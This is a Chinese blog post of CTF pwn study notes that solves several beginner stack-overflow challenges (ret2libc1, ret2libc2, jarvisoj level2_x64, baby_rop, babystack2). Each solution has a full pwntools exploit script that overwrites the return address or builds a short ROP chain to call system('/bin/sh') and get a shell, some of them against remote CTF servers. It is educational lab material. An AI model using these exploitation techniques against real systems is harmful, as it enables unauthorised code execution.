Pwn学习 (3)

最新推荐文章于 2024-02-19 11:03:47 发布
最新推荐文章于 2024-02-19 11:03:47 发布
阅读量639 收藏 2
点赞数 1
分类专栏: Pwn 文章标签: 学习 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127527433
版权

1. ret2libc1

checksec,没开启canary和地址随机化,只有NX 

IDA Pro 静态调试

 

明显的栈溢出漏洞

 

 输入一个字符串,如果这个字符串与secretcode(随机值)一样,则调用system函数

但是system内的不是熟悉的/bin/sh,而是shell!?,相当于在Terminal中输入

因此需要给shell!?覆盖为/bin/sh

gdb动态编译获取需要输入的字符数量

 

 

system地址

  

/bin/sh地址 

Payload

system_addr = 0x08048460
binsh_addr = 0x08048720
b'A' * ( 108 +  0x04 ) + p32(system_addr) + p32(binsh_addr)

 构造PoC

from pwn import *
io = process("/root/Desktop/Pwn/ret2libc1")

system_addr = 0x08048460
binsh_addr = 0x08048720
payload = ( b'A' * ( 108 + 0x04 ) + p32(system_addr) + b'A' * 4 + p32(binsh_addr) )
io.sendline(payload)
io.interactive()

 成功获取shell

2. ret2libc2 

checksec

IDA Pro 静态调试

 

 

依旧没有/bin/sh,但是这一次Shift+F12里也没有

依旧是栈溢出漏洞

 

 

 

 可以将/bin/sh写入.bss段中,因为未开启PIE,并且bss可执行。

思路如下:

先覆写到ebp的位置,然后gets 输入system的地址,最后在输入/bin/sh

在栈中应该是这样的

 

 

system地址

 

gets地址

得出Payload

system_addr = 0x08048490
gets_addr = 0x08048460
buf2 = 0x0804A080
payload = ( b'A' * ( 108 + 0x04 ) + p32(gets_addr) + p32(system_addr) + p32(buf2) + p32(buf2) )

 构造PoC

from pwn import *
io = process("/root/Desktop/Pwn/ret2libc2")

system_addr = 0x08048490
gets_addr = 0x08048460
buf2 = 0x0804A080
payload = ( b'A' * ( 108 + 0x04 ) + p32(gets_addr) + p32(system_addr) + p32(buf2) + p32(buf2) )
io.sendline(payload)
io.sendline('/bin/sh')
io.interactive()

 

成功获取shell

3. ret2libc3 

看了半天没看懂,不写了

4. jarvisoj_level2_x64

checksec

 

没开canary也没开PIE,IDA Pro静态调试

 

 

栈溢出漏洞,需要填充 128 + 0x08 个字符

有system和/bin/sh

Payload

system函数地址:

/bin/sh地址:

from pwn import *

io = process("/root/Desktop/Pwn/level2_x64")

binsh_addr = 0x600A90
system_addr = 0x4004C0
pop_rdi_addr = 0x4006b3
payload = ( b'A' * ( 128 + 0x08 ) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) )
io.sendline(payload)
io.interactive()

 

此外还需要一个pop_rdi,大佬们的说法是平衡栈帧

构造PoC

from pwn import *

io = process("/root/Desktop/Pwn/level2_x64")

binsh_addr = 0x600A90
system_addr = 0x4004C0
pop_rdi_addr = 0x4006b3
payload = ( b'A' * ( 128 + 0x08 ) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) )
io.sendline(payload)
io.interactive()

 成功获取shell并cat flag.txt

 5. [HarekazeCTF2019]baby_rop

checksec

 

IDA下甚至和之前的level2没什么区别,level2的PoC改一改就能用了

还是 sys , binsh , pop_rdi

就不过多赘述了

构造PoC

from pwn import *

io = remote("node4.buuoj.cn",28127)

binsh_addr = 0x601048
system_addr = 0x400490
pop_rdi_addr = 0x400683
payload = ( b'A' * ( 0x10 + 0x08 ) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) )
io.sendline(payload)
io.interactive()

成功获取shell,不过随时都会关闭,这题的flag存在/home/babyrop的flag中。

6. bjdctf_2020_babystack2

和1一模一样的解法,答案都丝毫不相差。

Pwn学习 (2)_Red-Leaves的博客-CSDN博客

from pwn import *

io = remote("node4.buuoj.cn",25615)
#io = process("/root/Desktop/Pwn/bjdctf_2020_babystack2")

binsh_addr = 0x400726
#system_addr = 0x400490
#pop_rdi_addr = 0x400893
io.recvuntil(b"your name:")
io.sendline('-1')
payload = ( b'A' * ( 0x10 + 0x08 ) + p64(binsh_addr) )
io.recvuntil(b"name?")
io.sendline(payload)
io.interactive()

 

成功拿到flag,不过可能有网络波动或者什么问题偶尔断开一下,多试几次就好了。 

研究研究 ret2libc3 再看看后续的题,发现后续的题目都是需要这个的。

Red-Leaves
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记
pwn学习
weixin_40597510的博客
01-24 495
转自https://r00tk1ts.github.io/2017/09/11/PWN%E9%80%89%E6%89%8B%E7%9A%84%E8%87%AA%E6%88%91%E4%BF%AE%E5%85%BB/#%E6%A0%88%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95 栈 特性:先进先出 内存的一片区间,栈型结构管理,...
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 349
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
Pwn学习
红叶的博客
10-25 1110
需要输入的字符数量为112,由于没有system,因此需要使用ROPgadget工具。其中vuln函数与replace函数配合使用,输入的I被replace函数替换为you。这题没什么好说的,打开就是shell函数,使用nc直接连接就可以拿到shell。输入I又被替换为you,因此60/3 = 20,输入20个I即可溢出。栈溢出漏洞,buf2为全局变量,并且是bss段,具有可执行权限。shell的地址为IDA下get_shell函数的地址 即。fun函数为shell函数,main函数中存在栈溢出漏洞。
小白言承之PWN学习路线(持续更新)
像初雪一样自由洒落
01-29 6243
PWN(溢出):PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有栈溢出、堆溢出。在CTF比赛中,线上比赛会有,但是比例不会太重,进入线下比赛,逆向和溢出则是战队实力的关键。主要考察参数选手漏洞挖掘和利用能力。 CTF PWN特点:入门难、进阶难、精通难 pwn学习内容: (1)了解Linux ELF文件 (2)分析掌握栈溢出原理理解函数参...
攻防世界PWN之shell题解
seaaseesa的博客
11-22 1397
shell 首先,检查一下程序的保护机制 然后,我们用IDA分析 存在栈溢出漏洞 我们先运行程序,发现可以直接输命令 然而,其他命令都不可用,需要登录成功才能用 我们看看登录的逻辑 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码 只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shel...
栈溢出漏洞学习与剖析
njh18790816639的博客
03-13 292
0x00 刚开始接触pwn,但是pwn呢!不应该只会做题,应该理解里面的原理,所以我们来看看程序里面究竟蕴含着什么神秘! 0x01 程序的执行就是一种线性的"纸",上面有许多内容。 就是一张"纸",在上面写了很多内容,Stack是栈,Heap是堆,这两个是最为关键的,因为接下来我们利用的就是有关这两个的漏洞。 程序在上面执行,code代码段(其实就是汇编指令)利用这里面的指令一步一步的运行。你可能有疑问?while和if和for等其实就是jmp等跳转指令,从一张"纸"的第一行开始"写",到了第三行(假设)有
pwn的五道基础题
lllwky的博客
03-27 6541
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
慎用“from pwn import *”!和re库findall方法重名引发的问题
ATFWUS的博客
01-23 405
今天搓一个sage脚本遇到一个很无语的问题,经过调试,发现是pwntools库中的findall方法和re库中的findall方法重名导致的。这两个findall方法的用法完全不一样,稍有不慎就会踩坑。
CTF-PWN环境搭建
半岛铁盒的博客
02-24 1386
1.虚拟环境:Ubuntu 18.04 2.必备一般软件 vim:个人必备,强烈建议学习一点vim的相关知识,可以提高效率,避免安装过多的编辑器或者IDE git:必备,很多高效的插件都是放在GitHub上的 python:必备,建议python3,毕竟python2已经不支持了 pip:必备,有一些插件需要使用pip进行安装 一款编辑器:这个看个人需求,vscode、sublime text等,个人喜欢就好。如果有条件的话,可以设置一下配置,当作一个简单的开发IDE使用,毕竟Pwn环境中开发的代码不会很多
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
PWN学习笔记 NSS
最新发布
2301_79525044的博客
02-19 241
payload1=b'a'*(0x10)+p64(rdi)+p64(0)+p64(rsi)+p64(buf/*写入/bin/sh的地址,如bss段*/)+p64(rdx)+p64(8)+p64(elf.sym['read'])#调用read函数,将/bin/sh写入buf。syscall:ROPgadget --binary 文件名 | grep syscall。在gdb中 i r fs_base #得到fs_base 十六进制数据 十进制数据。关闭canary:-fno-stack-protector。
pwn学习心得
wuduan675068994的博客
05-09 359
pwn学习心得 #---------------------------- a001 from pwn import * #要执行的函数的地址 sysaddr = 0x08048320 #执行的函数的参数的地址 binshaddr = 0x0804A024 #参数buf,申请了88h的空间(bp-88h),用a填充88的位置再加4(32位加4,64位加8) # # payload = b'a'*(0x88+0x04)+p32(systemaddr)+p32(0)+p32(binshaddr) a.s
PWN 基础环境配置
weixin_51867085的博客
01-17 1369
一些基础 pwn 环境
gdb参数详解(整理过)
热门推荐
samehai的专栏
09-27 2万+
名称        gdb - GNU 调试器提要        gdb    [-help] [-nx] [-q] [-batch] [-cd=dir] [-f] [-b bps]              [-tty=dev] [-s symfile] [-e prog] [-se prog] [-c              core] [-x cmds] [-d dir] [prog[
一步一步学pwntools(适合新手)
qq_41683305的博客
04-09 4728
pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然而目前并没有一个很好的新手教程。因此我用了我过去的几篇writeup。由于本文只是用来介绍pwntools使用方法,我不会过于详细的讲解各种二进制漏洞攻击技术。 Pwntools的“Hello World” 栈溢出无疑是二进制攻击的“Hello World”。这里,我们用pwnable.kr的bof来进行展示。 #incl...
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。...3. 学习常见的漏洞挖掘技术,如栈溢出、堆溢出、格式化字符串漏洞等; 4. 实践PWN攻击,可以使用一些CTF平台上的题目进行练习。 希望这些指导对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值